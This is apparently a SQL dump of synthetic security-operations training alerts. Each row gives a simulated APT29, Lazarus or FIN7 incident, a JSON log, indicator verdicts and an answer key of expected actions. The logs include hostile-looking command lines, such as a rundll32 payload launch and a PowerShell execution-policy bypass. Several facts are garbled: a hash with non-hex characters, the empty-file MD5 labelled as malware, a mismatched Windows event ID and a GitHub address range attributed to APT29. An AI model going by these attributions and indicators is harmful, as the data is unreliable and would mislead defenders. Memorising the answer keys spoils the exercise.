'{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"malware_hash\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"username\":\"j.doe\",\"filename\":\"payload_stage2.dll\",\"process_name\":\"svchost.exe\",\"command_line\":\"rundll32.exe payload_stage2.dll,EntryPoint\",\"event_description\":\"Second-stage payload executed on the host, enhancing attacker capabilities.\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by second-stage payload.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT29 second-stage payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload_stage2.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in second-stage malware deployment.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (562, 'Data Exfiltration via Stealth Channels', 'high', 'Outbound Traffic Monitoring', 'Detected data exfiltration attempt by APT29 using stealthy communication channels to transmit sensitive information from the internal network to an external server.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:25:43Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"185.199.110.153\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"file_name\":\"confidential_report_2023.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_id\":\"jdoe\",\"action\":\"File Upload\",\"url\":\"https://maliciousdomain.com/upload\",\"description\":\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT29 operations\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated data by APT29\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration activities\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (563, 'Covering Tracks and Cleanup', 'high', 'System Logs', 'APT29 engaged in advanced defense evasion techniques by cleaning up system logs, removing files, and altering timestamps to eradicate evidence of their intrusion. The activity was detected following unusual log deletions and file manipulations on the compromised host.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.100\",\"username\":\"j.doe\",\"deleted_files\":[\"C:\\\\Windows\\\\Temp\\\\malicious_log.bak\",\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\APT29_trace.txt\"],\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"File Deletion\",\"log_source\":\"Windows Security\",\"message\":\"User j.doe executed file deletion commands to remove traces of unauthorized access.\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious file used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (564, 'Initial Access via Phishing', 'medium', 'Email Security Logs', 'Lazarus Group initiates the attack by deploying phishing emails to Sony employees, leading to network infiltration.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:22:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Urgent: Action Required for Sony Account Update\",\"email_from\":\"it-support@sonypictures.com\",\"email_to\":\"john.doe@sonypictures.com\",\"attachment\":\"update-instructions.pdf\",\"attachment_hash\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"malicious_link\":\"http://malicious-update.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-07 22:40:38', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Sony Pictures network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"it-support@sonypictures.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known phishing PDF attachment.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Scan\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Beginner', 'NULL', 1, 0, NULL), (565, 'Execution of Destover Malware', 'high', 'Endpoint Detection and Response (EDR)', 'The attackers execute the \'Destover\' wiper malware, causing widespread system damage and data destruction.', 'Malware Deployment', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"EDR-2023-1024\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"malware_name\":\"Destover\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\destover_wiper.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"process_id\":5678,\"action\":\"Malware Execution\",\"description\":\"Detected execution of Destover malware on endpoint.\"}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Destover malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (566, 'Establishing Persistence - Backdoor Installation', 'medium', 'Network Traffic Analysis', 'A backdoor associated with the Lazarus Group was detected on the network, indicating an attempt to establish persistence on the compromised system.', 'Backdoor Installation', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/backdoor/installer.php\",\"method\":\"GET\",\"http_version\":\"1.1\",\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"username\":\"jdoe\",\"action\":\"Download\",\"status\":\"200 OK\"}', '2026-01-07 22:40:38', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Lazarus Group infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Lazarus Group backdoor installer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File known to be used by Lazarus Group for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious download activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (567, 'Lateral Movement Within Network', 'high', 'Internal Server Logs', 'During step 4 of the operation, the Lazarus Group has moved laterally within the network, identifying critical systems for further exploitation. This activity was detected through internal server logs showing unauthorized access attempts and suspicious file transfers.', 'Internal Network Reconnaissance', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:23Z\",\"event_id\":\"4720\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"192.168.10.5\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"network_admin\",\"action\":\"login_attempt\",\"result\":\"success\",\"file_transferred\":\"exploit_tool_v2.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"target_system\":\"192.168.10.5\",\"protocol\":\"SMB\",\"notes\":\"Possible use of stolen credentials to access sensitive systems.\"}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network source IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target system within network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with Lazarus Group\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_tool_v2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unfamiliar executable transferred internally\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (568, 'Data Exfiltration via Proxy Chains', 'high', 'Proxy Server Logs', 'Sensitive data, including unreleased films and executive emails, is exfiltrated using complex proxy chains to obfuscate the attack origin. This operation is linked to the Lazarus Group, known for using destructive malware and financial theft tactics.', 'Data Theft', 'T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Pr', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.56\",\"proxy_chain\":[\"10.1.1.1\",\"172.16.0.5\",\"203.0.113.56\"],\"username\":\"jdoe\",\"file_exfiltrated\":\"executive_emails.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\"}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"executive_emails.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_filesystem\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_database\",\"verdict\":\"internal\",\"details\":\"Internal user account possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (569, 'Destruction of Evidence', 'medium', 'System Log Analysis', 'An attempt to delete system logs to erase traces of a cyberattack was detected. The action is suspected to be part of a cover-up strategy by the attackers to complicate forensic investigations.', 'Log Deletion', 'T1070.004 - Indicator Removal on Host: File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:45Z\",\"eventID\":\"4625\",\"log_name\":\"Security\",\"message\":\"A deletion event was detected on the system logs located at C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx.\",\"user\":\"malicious_actor\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.12\",\"deleted_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process_name\":\"cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-07 22:40:38', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company internal IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"Critical system log file targeted for deletion.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lazarus Group\'s malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (570, 'Analysis of Geopolitical Motivations', 'high', 'Geopolitical Reports', 'This alert focuses on analyzing the geopolitical factors linking the recent cyber attack to North Korea\'s strategic goals and financial needs, specifically attributed to the Lazarus Group. The attack employed destructive malware and financial theft tactics.', 'Threat Intelligence Analysis', 'T1485: Data Destruction, T1589: Gather Victim Identity Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:35Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"malware_name\":\"WannaCry\",\"attacker_domain\":\"malicious-nk-group.com\",\"user\":\"jdoe\",\"filename\":\"ransomware_payload.exe\",\"action\":\"Data exfiltration attempt detected\",\"indicators\":[{\"indicator_type\":\"ip\",\"value\":\"203.0.113.45\",\"role\":\"attacker\"},{\"indicator_type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"role\":\"malware\"}]}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address linked to North Korean threat actor group Lazarus\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (571, 'Compromised HVAC Vendor Access', 'high', 'Firewall logs', 'FIN7 initiated an attack by exploiting a vulnerability in the HVAC vendor\'s network, providing an entry point into Target\'s infrastructure. The attack was detected through unusual traffic patterns in the firewall logs, originating from a known malicious IP associated with FIN7 operations.', 'Initial Access', 'T1199: Trusted Relationship', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TCP\",\"action\":\"allowed\",\"username\":\"hvac_vendor\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_update.exe\",\"event_id\":\"FW-0002345678\",\"message\":\"Unusual traffic from trusted HVAC vendor IP\"}', '2026-01-08 22:01:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known FIN7 C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"HVAC vendor access point\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as malware associated with FIN7\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename known to be used by FIN7\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hvac_vendor\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Recognized vendor account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (572, 'Deploying RAM-Scraping Malware', 'high', 'Endpoint detection and response (EDR) logs', 'The EDR system detected the deployment of a RAM-scraping malware on POS systems. The malware was installed to capture unencrypted credit card data during transactions. Indicators of compromise (IOCs) were identified, including a known malicious IP address and file hash associated with RAM-scraping activities.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_type\":\"process_creation\",\"hostname\":\"POS-Server-01\",\"username\":\"admin\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -exec bypass -file C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"file_hash\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"source_ip\":\"198.51.100.27\",\"destination_ip\":\"192.168.1.25\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\"}', '2026-01-08 22:01:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.27\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous RAM-scraping malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3d2e1f99b8a4b3c2d5e6f7g8h9i0j1k2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as RAM-scraping malware variant.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\ram_scrape.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"File contains scripts for RAM-scraping operations.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (573, 'Establishing Persistence', 'medium', 'Active Directory logs', 'An unauthorized user account was created in the Active Directory to maintain persistent access to the network. The account creation was detected, indicating a potential persistence technique being employed by attackers.', 'Persistence', 'T1136: Create Account', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T10:15:30Z\",\"event_id\":\"4720\",\"event_source\":\"Security\",\"computer_name\":\"DC1.corporate.local\",\"user\":\"SYSTEM\",\"target_user\":{\"account_name\":\"unauthorized_admin\",\"account_domain\":\"corporate\",\"user_id\":\"S-1-5-21-1234567890-1234567890-1234567890-1001\"},\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.50\",\"logon_type\":\"3\",\"logon_process\":\"Advapi\",\"authentication_package\":\"Negotiate\"}', '2026-01-08 22:01:14', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"unauthorized_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized user account created to maintain persistence.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP is associated with known malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (574, 'Lateral Movement to Payment Network', 'high', 'Network traffic analysis', 'FIN7 has moved laterally within the network using compromised credentials to access the payment processing network. The movement was detected through unusual network activity and the presence of known malicious IP addresses and file hashes.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:27:45Z\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"credential_dump.exe\",\"event\":\"lateral movement detected\",\"description\":\"User jdoe moved laterally from 10.0.2.15 to 192.168.1.10 using stolen credentials, connecting from the external IP 203.0.113.45. Detected file hash e99a18c428cb38d5f260853678922e03 associated with known malware.\"}', '2026-01-08 22:01:14', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal monitoring\",\"verdict\":\"internal\",\"details\":\"Internal network IP 